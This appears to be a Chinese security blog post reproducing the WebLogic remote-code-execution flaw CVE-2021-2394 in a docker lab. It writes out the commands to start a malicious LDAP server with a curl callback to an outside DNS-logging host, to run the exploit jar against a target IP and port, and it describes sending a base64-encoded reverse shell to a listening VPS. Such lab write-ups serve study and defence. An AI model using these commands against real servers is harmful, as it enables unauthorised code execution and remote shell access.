【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

  • A+
所属分类:安全文章

0x01 前言

    近日翻看了最新的一些漏洞,看到了一个weblogic的新漏洞,便找了一些网上的文章资料,准备复现一下补充补充知识。

【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

文中涉及的工具可后台回复关键字"2394"获取

0x02 环境搭建

所用到的环境如下:

docker // 这里用的是vulhub里的CVE-2020-14882漏洞环境ceye.io   //   dns接收平台kali虚拟机两台

这里直接利用docker搭建的环境

docker-compose up -d     //启动环境

【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394


0x03 漏洞复现

先起个LDAP服务

命令如下:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl xxx.ceye.io-A 192.168.46.135
-C [执行的命令] -A [开启ldap服务的ip]

【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

执行EXP

命令如下:java -jar CVE_2021_2394.jar 192.168.46.131 7001 ldap://192.168.46.135:1389/s5tb3ejava -jar CVE_2021_2394.jar [被攻击者IP] [端口] [生成的ldap服务,我用的jdk8]

【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

Success!!

【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

反弹shell

注意:反弹shell时命令需要进行base64编码

http://www.jackson-t.ca/runtime-exec-payloads.html

【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

将编码后的payload替换,启动LDAP服务

vps开启监听

执行EXP

【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

反弹shell成功!!

【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

0x04 参考链接

https://mp.weixin.qq.com/s/ZdA17tU_PeJEkc26yfK3uQhttps://www.cnblogs.com/potatsoSec/p/15062094.htmlhttps://www.jianshu.com/p/60f0f8667a6f





本文仅供学习交流!由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


本文始发于微信公众号(Qingy之安全):【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: